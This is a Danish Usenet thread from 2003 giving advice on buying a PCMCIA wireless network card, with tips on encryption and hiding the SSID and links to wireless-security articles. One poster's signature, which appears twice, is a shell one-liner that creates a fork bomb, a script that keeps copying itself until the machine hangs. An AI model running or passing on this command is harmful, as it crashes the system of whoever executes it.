Trådløs Netværkskort??
Fra : Michael

Dato : 23-03-03 14:36

Jeg skal ud ud og investere i ovenstående. Det skal være PCMCIA. Ville godt
vide hva jeg skal tage højde for og gode/dårlige erfaringer. Håber i kan
hjælpe!
Michael

Fra : Michal

Dato : 23-03-03 17:13

In news:cLifa.1910$vn1.502854@news010.worldonline.dk,
Michael <mhansen@jyde.dk> wrote:

> Jeg skal ud ud og investere i ovenstående. Det skal være PCMCIA.
> Ville godt vide hva jeg skal tage højde for og gode/dårlige
> erfaringer. Håber i kan hjælpe!

Har du selv accesspoint?

Sørg for at kortet ikke sender SSID og at det understøtter 802.1A mener jeg
vist det hedder. Og så skal det også være i stand til at sende krypteret...

Ellers er det alt for let at hijacke din session, logge på som dig, eller
bare se hva' du laver på forbindelsen...

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Jens Rex Bræmhøj

Dato : 24-03-03 00:14

Lidt læsestof omhandlende wireless sikkerhed.

Et must-read:

"Security Practicum: Essential Home Wireless Security Practices"
http://arstechnica.com/paedia/w/wireless-security-howto/home-802.11b-1.html

Hvis du er til mere:

"Wireless Security Blackpaper"
http://arstechnica.com/paedia/w/wireless/security-1.html

Tjek iøvrigt disse interessante artikler om War Flying (War Driving er håbløst
umoderne).

"War Flying over San Diego"
http://arstechnica.com/wankerdesk/3q02/warflying-1.html

"War Flying over Silicon Valley"
http://arstechnica.com/wankerdesk/3q02/warflying-2.html

--
Der er ingen tal i min e-mail adresse.

Fra : Henrichsen

Dato : 24-03-03 09:34

Tror du at det foregår i Danmark?

Fra : Michal

Dato : 27-03-03 19:28

In news:iifs7vgc83mnotbhfu8m1hde8rd0kmu05i@dtext.news.tele.dk,
Jens Rex Bræmhøj <jens2000@jensrex2000.net> wrote:

> "War Flying over San Diego"
> http://arstechnica.com/wankerdesk/3q02/warflying-1.html

spændende :)

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 16:45

On Sun, 23 Mar 2003 14:35:43 +0100, "Michael" <mhansen@jyde.dk> wrote:

> [...]
>vide hva jeg skal tage højde for og gode/dårlige erfaringer. Håber i kan

Du skal holde øje med hvad overførselshastighed netkoret kan trække og
om denne hastighed kan "opgraderes" enten via en firmware update eller
på anden måde.
Flemming Jacobsen